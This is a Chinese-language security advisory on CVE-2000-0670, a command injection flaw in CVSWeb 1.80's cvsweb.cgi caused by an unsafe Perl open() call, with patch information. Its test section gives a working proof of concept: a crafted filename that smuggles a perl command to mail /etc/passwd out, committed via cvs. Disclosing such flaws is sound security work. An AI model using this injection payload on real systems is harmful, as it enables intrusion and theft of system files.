首页 -> 安全研究

安全研究

安全漏洞
CVSWeb的cvsweb.cgi远程执行任意命令漏洞

发布日期:2000-07-12
更新日期:2000-07-12

受影响系统:
Zeller CVSWeb 1.80
不受影响系统:
Zeller CVSWeb 1.89
Zeller CVSWeb 1.86
描述:
BUGTRAQ  ID: 1469
CVE(CAN) ID: CVE-2000-0670

CVSWeb是一种基于Web的可被用来在主机之间共享程序代码的软件开发工具。

Cvsweb 1.80存在一个安全漏洞,远程攻击者只要对cvs库有写权限,就可以获得对cvs server的shell访问权限,以CVS守护进程的权限执行任意命令。

出问题的代码在cvsweb.cgi脚本中:

open($fh, "rlog '$filenames' 2>/dev/null |")

由于对Perl的open()函数被错误调用,攻击者可以通过建立一个特殊的文件名,来发动攻击。


<*来源:Joey Hess (joey@kitenet.net
  
  链接:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0670
        http://online.securityfocus.com/bid/1469/info/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

攻击者会首先按照下列步骤操作:

SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE

然后攻击者会访问cvsweb页面,浏览他设置木马文件的目录。这将导致/etc/passwd 文件被发送给攻击者,当然攻击者也可以执行其他的命令。

建议:
厂商补丁:

Zeller
------
厂商已经在1.86版的软件中修补了这个安全漏洞,请到厂商的主页下载:

http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/

浏览次数:5598
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障